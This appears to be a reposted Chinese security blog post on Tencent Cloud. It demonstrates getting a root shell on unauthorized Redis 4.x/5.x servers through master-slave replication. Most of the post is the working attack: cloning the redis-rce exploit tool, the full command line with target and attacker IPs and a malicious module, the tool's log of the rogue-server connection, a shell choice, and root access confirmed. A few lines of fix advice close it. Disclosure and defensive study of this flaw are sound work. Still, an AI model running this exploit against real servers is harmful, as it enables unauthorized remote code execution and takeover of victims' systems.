Redis未授权通过主从复制 GetShell[Exp]
脆弱目标查询漏洞关键词redis 默认端口6379,影响版本 4.x/5.xExp利用攻击机Ubuntu,ip地址192.168.1.107,下载exp脚本,然后输入参数开始。git close https://github.com/Ridter/redis-rce cd redis-rce greekn@greekn:~/redis-rce$ py
脆弱目标查询
漏洞关键词redis 默认端口6379,影响版本 4.x/5.x
![Redis未授权通过主从复制 GetShell[Exp] exp getshell Redis 安全文摘 第1张](https://ask.qcloudimg.com/http-save/yehe-2638143/fe53c962275b9a2f5f07028fcaf85448.png)
Redis未授权通过主从复制 GetShell[Exp] exp getshell Redis 安全文摘 第1张
Exp利用
攻击机Ubuntu,ip地址192.168.1.107,下载exp脚本,然后输入参数开始。
git close https://Github.com/Ridter/redis-rce
cd redis-rce
greekn@greekn:~/redis-rce$ Python3 redis-rce.py -r 192.168.1.16 -L 192.168.1.107 -f exp_lin.so
█▄▄▄▄ ▄███▄ ██▄ ▄█ ▄▄▄▄▄ █▄▄▄▄ ▄█▄ ▄███▄
█ ▄▀ █▀ ▀ █ █ ██ █ ▀▄ █ ▄▀ █▀ ▀▄ █▀ ▀
█▀▀▌ ██▄▄ █ █ ██ ▄ ▀▀▀▀▄ █▀▀▌ █ ▀ ██▄▄
█ █ █▄ ▄▀ █ █ ▐█ ▀▄▄▄▄▀ █ █ █▄ ▄▀ █▄ ▄▀
█ ▀███▀ ███▀ ▐ █ ▀███▀ ▀███▀
▀ ▀
[*] Connecting to 192.168.1.16:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.1.16:6379
[*] Setting filename
[+] Accepted connection from 192.168.1.16:6379
[*] Start listening on 192.168.1.107:21000
[*] Tring to run Payload
[+] Accepted connection from 192.168.1.16:38875
[*] Closing rogue server...
[+] What do u want ? [i]nteractive shell or [r]everse shell: i
[+] Interactive shell open , use "exit" to exit...
$ whoami
root
$本次受影响版本
Redis 2.x 3.x 4.x 5.x
修复建议
禁止外部访问redis服务端口
禁止root权限启动redis服务
限制链接redis服务的IP
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-07-10),如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
云数据库 Redis
腾讯云数据库 Redis(TencentDB for Redis)是腾讯云打造的兼容 Redis 协议的缓存和存储服务。丰富的数据结构能帮助您完成不同类型的业务场景开发。支持主从热备,提供自动容灾切换、数据备份、故障迁移、实例监控、在线扩容、数据回档等全套的数据库服务。
腾讯云开发者
